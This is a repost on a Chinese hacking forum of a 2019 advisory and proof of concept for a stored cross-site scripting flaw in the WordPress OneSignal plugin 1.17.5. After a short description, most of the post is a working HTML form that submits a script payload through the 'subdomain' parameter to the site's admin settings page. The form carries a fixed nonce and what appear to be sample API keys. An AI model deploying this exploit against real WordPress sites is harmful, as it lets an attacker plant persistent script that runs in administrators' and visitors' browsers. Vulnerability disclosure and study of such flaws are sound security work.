跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting

精选回复

发布于
# Exploit Title: WordPress Plugin OneSignal 1.17.5 - Persistent Cross-Site Scripting
# Date: 2019-07-18
# Vendor Homepage: https://www.onesignal.com
# Software Link:  https://wordpress.org/plugins/onesignal-free-web-push-notifications/
# Affected version: 1.17.5
# Exploit Author: LiquidWorm
# Tested on: Linux

Summary: OneSignal is a high volume and reliable push notification service
for websites and mobile applications. We support all major native and mobile
platforms by providing dedicated SDKs for each platform, a RESTful server API,
and an online dashboard for marketers to design and send push notifications.

Desc: The application suffers from an authenticated stored XSS via POST request.
The issue is triggered when input passed via the POST parameter 'subdomain' is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: WordPress 5.2.2
           Apache/2.4.39
           PHP/7.1.30


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5530
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5530.php

<html>
  <body>
  <script>history.pushState('', 'SHPA', '/')</script>
    <form action="http://127.0.0.1/wp-admin/admin.php?page=onesignal-push" method="POST">
      <input type="hidden" name="onesignal_config_page_nonce" value="f7fae30a4f" />
      <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=onesignal-push" />
      <input type="hidden" name="app_id" value="14d99ab2-fc9d-1337-bc16-a8a6df479515" />
      <input type="hidden" name="app_rest_api_key" value="M2IzZDA4MzItOGJmOS00YjRkLWE4YzEtZSLmMjllNjlkYmZl" />
      <input type="hidden" name="subdomain" value=""><script>confirm(251)</script>" />
      <input type="hidden" name="safari_web_id" value="" />
      <input type="hidden" name="showNotificationIconFromPostThumbnail" value="true" />
      <input type="hidden" name="showNotificationImageFromPostThumbnail" value="true" />
      <input type="hidden" name="persist_notifications" value="platform-default" />
      <input type="hidden" name="notification_title" value="hACKME" />
      <input type="hidden" name="notifyButton_enable" value="true" />
      <input type="hidden" name="notifyButton_showAfterSubscribed" value="true" />
      <input type="hidden" name="notifyButton_prenotify" value="true" />
      <input type="hidden" name="notifyButton_showcredit" value="true" />
      <input type="hidden" name="notifyButton_customize_enable" value="true" />
      <input type="hidden" name="notifyButton_size" value="medium" />
      <input type="hidden" name="notifyButton_position" value="bottom-right" />
      <input type="hidden" name="notifyButton_theme" value="default" />
      <input type="hidden" name="notifyButton_offset_bottom" value="" />
      <input type="hidden" name="notifyButton_offset_left" value="" />
      <input type="hidden" name="notifyButton_offset_right" value="" />
      <input type="hidden" name="notifyButton_color_background" value="" />
      <input type="hidden" name="notifyButton_color_foreground" value="" />
      <input type="hidden" name="notifyButton_color_badge_background" value="" />
      <input type="hidden" name="notifyButton_color_badge_foreground" value="" />
      <input type="hidden" name="notifyButton_color_badge_border" value="" />
      <input type="hidden" name="notifyButton_color_pulse" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background_hover" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_background_active" value="" />
      <input type="hidden" name="notifyButton_color_popup_button_color" value="" />
      <input type="hidden" name="notifyButton_message_prenotify" value="" />
      <input type="hidden" name="notifyButton_tip_state_unsubscribed" value="" />
      <input type="hidden" name="notifyButton_tip_state_subscribed" value="" />
      <input type="hidden" name="notifyButton_tip_state_blocked" value="" />
      <input type="hidden" name="notifyButton_message_action_subscribed" value="" />
      <input type="hidden" name="notifyButton_message_action_resubscribed" value="" />
      <input type="hidden" name="notifyButton_message_action_unsubscribed" value="" />
      <input type="hidden" name="notifyButton_dialog_main_title" value="" />
      <input type="hidden" name="notifyButton_dialog_main_button_subscribe" value="" />
      <input type="hidden" name="notifyButton_dialog_main_button_unsubscribe" value="" />
      <input type="hidden" name="notifyButton_dialog_blocked_title" value="" />
      <input type="hidden" name="notifyButton_dialog_blocked_message" value="" />
      <input type="hidden" name="prompt_customize_enable" value="true" />
      <input type="hidden" name="prompt_action_message" value="" />
      <input type="hidden" name="prompt_auto_accept_title" value="" />
      <input type="hidden" name="prompt_site_name" value="" />
      <input type="hidden" name="prompt_example_notification_title_desktop" value="" />
      <input type="hidden" name="prompt_example_notification_message_desktop" value="" />
      <input type="hidden" name="prompt_example_notification_title_mobile" value="" />
      <input type="hidden" name="prompt_example_notification_message_mobile" value="" />
      <input type="hidden" name="prompt_example_notification_caption" value="" />
      <input type="hidden" name="prompt_accept_button_text" value="" />
      <input type="hidden" name="prompt_cancel_button_text" value="" />
      <input type="hidden" name="send_welcome_notification" value="true" />
      <input type="hidden" name="welcome_notification_title" value="" />
      <input type="hidden" name="welcome_notification_message" value="" />
      <input type="hidden" name="welcome_notification_url" value="" />
      <input type="hidden" name="notification_on_post" value="true" />
      <input type="hidden" name="utm_additional_url_params" value="" />
      <input type="hidden" name="allowed_custom_post_types" value="" />
      <input type="hidden" name="custom_manifest_url" value="" />
      <input type="hidden" name="show_notification_send_status_message" value="true" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。